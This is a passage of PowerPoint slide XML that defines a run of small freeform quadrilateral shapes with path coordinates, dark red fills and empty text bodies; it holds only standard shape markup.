                    <a:gd name="T0" fmla="*/ 35 w 35"/>
                    <a:gd name="T1" fmla="*/ 27 h 57"/>
                    <a:gd name="T2" fmla="*/ 35 w 35"/>
                    <a:gd name="T3" fmla="*/ 57 h 57"/>
                    <a:gd name="T4" fmla="*/ 0 w 35"/>
                    <a:gd name="T5" fmla="*/ 29 h 57"/>
                    <a:gd name="T6" fmla="*/ 0 w 35"/>
                    <a:gd name="T7" fmla="*/ 0 h 57"/>
                    <a:gd name="T8" fmla="*/ 35 w 35"/>
                    <a:gd name="T9" fmla="*/ 27 h 57"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 35"/>
                    <a:gd name="T16" fmla="*/ 0 h 57"/>
                    <a:gd name="T17" fmla="*/ 35 w 35"/>
                    <a:gd name="T18" fmla="*/ 57 h 57"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="35" h="57">
                      <a:moveTo>
                        <a:pt x="35" y="27"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="35" y="57"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="29"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="35" y="27"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10867" name="Freeform 273"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2631" y="3201"/>
                  <a:ext cx="35" cy="56"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 35 w 35"/>
                    <a:gd name="T1" fmla="*/ 28 h 56"/>
                    <a:gd name="T2" fmla="*/ 35 w 35"/>
                    <a:gd name="T3" fmla="*/ 56 h 56"/>
                    <a:gd name="T4" fmla="*/ 0 w 35"/>
                    <a:gd name="T5" fmla="*/ 28 h 56"/>
                    <a:gd name="T6" fmla="*/ 0 w 35"/>
                    <a:gd name="T7" fmla="*/ 0 h 56"/>
                    <a:gd name="T8" fmla="*/ 35 w 35"/>
                    <a:gd name="T9" fmla="*/ 28 h 56"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 35"/>
                    <a:gd name="T16" fmla="*/ 0 h 56"/>
                    <a:gd name="T17" fmla="*/ 35 w 35"/>
                    <a:gd name="T18" fmla="*/ 56 h 56"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="35" h="56">
                      <a:moveTo>
                        <a:pt x="35" y="28"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="35" y="56"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="28"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="35" y="28"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10868" name="Freeform 274"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2594" y="3172"/>
                  <a:ext cx="34" cy="56"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 34 w 34"/>
                    <a:gd name="T1" fmla="*/ 28 h 56"/>
                    <a:gd name="T2" fmla="*/ 34 w 34"/>
                    <a:gd name="T3" fmla="*/ 56 h 56"/>
                    <a:gd name="T4" fmla="*/ 0 w 34"/>
                    <a:gd name="T5" fmla="*/ 28 h 56"/>
                    <a:gd name="T6" fmla="*/ 0 w 34"/>
                    <a:gd name="T7" fmla="*/ 0 h 56"/>
                    <a:gd name="T8" fmla="*/ 34 w 34"/>
                    <a:gd name="T9" fmla="*/ 28 h 56"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 34"/>
                    <a:gd name="T16" fmla="*/ 0 h 56"/>
                    <a:gd name="T17" fmla="*/ 34 w 34"/>
                    <a:gd name="T18" fmla="*/ 56 h 56"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="34" h="56">
                      <a:moveTo>
                        <a:pt x="34" y="28"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="34" y="56"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="28"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="34" y="28"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10869" name="Freeform 275"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2575" y="3158"/>
                  <a:ext cx="17" cy="41"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 17 w 17"/>
                    <a:gd name="T1" fmla="*/ 13 h 41"/>
                    <a:gd name="T2" fmla="*/ 17 w 17"/>
                    <a:gd name="T3" fmla="*/ 41 h 41"/>
                    <a:gd name="T4" fmla="*/ 0 w 17"/>
                    <a:gd name="T5" fmla="*/ 25 h 41"/>
                    <a:gd name="T6" fmla="*/ 0 w 17"/>
                    <a:gd name="T7" fmla="*/ 0 h 41"/>
                    <a:gd name="T8" fmla="*/ 17 w 17"/>
                    <a:gd name="T9" fmla="*/ 13 h 41"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 17"/>
                    <a:gd name="T16" fmla="*/ 0 h 41"/>
                    <a:gd name="T17" fmla="*/ 17 w 17"/>
                    <a:gd name="T18" fmla="*/ 41 h 41"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="17" h="41">
                      <a:moveTo>
                        <a:pt x="17" y="13"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="17" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="25"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17" y="13"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="400000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10870" name="Freeform 276"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2704" y="3332"/>
                  <a:ext cx="12" cy="41"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 12 w 12"/>
                    <a:gd name="T1" fmla="*/ 10 h 41"/>
                    <a:gd name="T2" fmla="*/ 12 w 12"/>
                    <a:gd name="T3" fmla="*/ 41 h 41"/>
                    <a:gd name="T4" fmla="*/ 0 w 12"/>
                    <a:gd name="T5" fmla="*/ 30 h 41"/>
                    <a:gd name="T6" fmla="*/ 0 w 12"/>
                    <a:gd name="T7" fmla="*/ 0 h 41"/>
                    <a:gd name="T8" fmla="*/ 12 w 12"/>
                    <a:gd name="T9" fmla="*/ 10 h 41"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 12"/>
                    <a:gd name="T16" fmla="*/ 0 h 41"/>
                    <a:gd name="T17" fmla="*/ 12 w 12"/>
                    <a:gd name="T18" fmla="*/ 41 h 41"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="12" h="41">
                      <a:moveTo>
                        <a:pt x="12" y="10"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="12" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="30"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12" y="10"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10871" name="Freeform 277"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2667" y="3300"/>
                  <a:ext cx="35" cy="59"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 35 w 35"/>
                    <a:gd name="T1" fmla="*/ 30 h 59"/>
                    <a:gd name="T2" fmla="*/ 35 w 35"/>
                    <a:gd name="T3" fmla="*/ 59 h 59"/>
                    <a:gd name="T4" fmla="*/ 0 w 35"/>
                    <a:gd name="T5" fmla="*/ 30 h 59"/>
                    <a:gd name="T6" fmla="*/ 0 w 35"/>
                    <a:gd name="T7" fmla="*/ 0 h 59"/>
                    <a:gd name="T8" fmla="*/ 35 w 35"/>
                    <a:gd name="T9" fmla="*/ 30 h 59"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 35"/>
                    <a:gd name="T16" fmla="*/ 0 h 59"/>
                    <a:gd name="T17" fmla="*/ 35 w 35"/>
                    <a:gd name="T18" fmla="*/ 59 h 59"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="35" h="59">
                      <a:moveTo>
                        <a:pt x="35" y="30"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="35" y="59"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="30"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="35" y="30"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10872" name="Freeform 278"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2631" y="3269"/>
                  <a:ext cx="35" cy="59"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 35 w 35"/>
                    <a:gd name="T1" fmla="*/ 30 h 59"/>
                    <a:gd name="T2" fmla="*/ 35 w 35"/>
                    <a:gd name="T3" fmla="*/ 59 h 59"/>
                    <a:gd name="T4" fmla="*/ 0 w 35"/>
                    <a:gd name="T5" fmla="*/ 28 h 59"/>
                    <a:gd name="T6" fmla="*/ 0 w 35"/>
                    <a:gd name="T7" fmla="*/ 0 h 59"/>
                    <a:gd name="T8" fmla="*/ 35 w 35"/>
                    <a:gd name="T9" fmla="*/ 30 h 59"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 35"/>
                    <a:gd name="T16" fmla="*/ 0 h 59"/>
                    <a:gd name="T17" fmla="*/ 35 w 35"/>
                    <a:gd name="T18" fmla="*/ 59 h 59"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="35" h="59">
                      <a:moveTo>
                        <a:pt x="35" y="30"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="35" y="59"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="28"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="35" y="30"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10873" name="Freeform 279"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2594" y="3237"/>
                  <a:ext cx="34" cy="59"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 34 w 34"/>
                    <a:gd name="T1" fmla="*/ 31 h 59"/>
                    <a:gd name="T2" fmla="*/ 34 w 34"/>
                    <a:gd name="T3" fmla="*/ 59 h 59"/>
                    <a:gd name="T4" fmla="*/ 0 w 34"/>
                    <a:gd name="T5" fmla="*/ 28 h 59"/>
                    <a:gd name="T6" fmla="*/ 0 w 34"/>
                    <a:gd name="T7" fmla="*/ 0 h 59"/>
                    <a:gd name="T8" fmla="*/ 34 w 34"/>
                    <a:gd name="T9" fmla="*/ 31 h 59"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 34"/>
                    <a:gd name="T16" fmla="*/ 0 h 59"/>
                    <a:gd name="T17" fmla="*/ 34 w 34"/>
                    <a:gd name="T18" fmla="*/ 59 h 59"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="34" h="59">
                      <a:moveTo>
                        <a:pt x="34" y="31"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="34" y="59"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="28"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="34" y="31"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10874" name="Freeform 280"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2575" y="3222"/>
                  <a:ext cx="17" cy="42"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 17 w 17"/>
                    <a:gd name="T1" fmla="*/ 14 h 42"/>
                    <a:gd name="T2" fmla="*/ 17 w 17"/>
                    <a:gd name="T3" fmla="*/ 42 h 42"/>
                    <a:gd name="T4" fmla="*/ 0 w 17"/>
                    <a:gd name="T5" fmla="*/ 27 h 42"/>
                    <a:gd name="T6" fmla="*/ 0 w 17"/>
                    <a:gd name="T7" fmla="*/ 0 h 42"/>
                    <a:gd name="T8" fmla="*/ 17 w 17"/>
                    <a:gd name="T9" fmla="*/ 14 h 42"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 17"/>
                    <a:gd name="T16" fmla="*/ 0 h 42"/>
                    <a:gd name="T17" fmla="*/ 17 w 17"/>
                    <a:gd name="T18" fmla="*/ 42 h 42"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="17" h="42">
                      <a:moveTo>
                        <a:pt x="17" y="14"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="17" y="42"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="27"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17" y="14"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="600000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10875" name="Freeform 281"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2704" y="3408"/>
                  <a:ext cx="11" cy="38"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 11 w 11"/>
                    <a:gd name="T1" fmla="*/ 8 h 38"/>
                    <a:gd name="T2" fmla="*/ 11 w 11"/>
                    <a:gd name="T3" fmla="*/ 38 h 38"/>
                    <a:gd name="T4" fmla="*/ 0 w 11"/>
                    <a:gd name="T5" fmla="*/ 27 h 38"/>
                    <a:gd name="T6" fmla="*/ 0 w 11"/>
                    <a:gd name="T7" fmla="*/ 0 h 38"/>
                    <a:gd name="T8" fmla="*/ 11 w 11"/>
                    <a:gd name="T9" fmla="*/ 8 h 38"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 11"/>
                    <a:gd name="T16" fmla="*/ 0 h 38"/>
                    <a:gd name="T17" fmla="*/ 11 w 11"/>
                    <a:gd name="T18" fmla="*/ 38 h 38"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="11" h="38">
                      <a:moveTo>
                        <a:pt x="11" y="8"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="11" y="38"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="27"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11" y="8"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
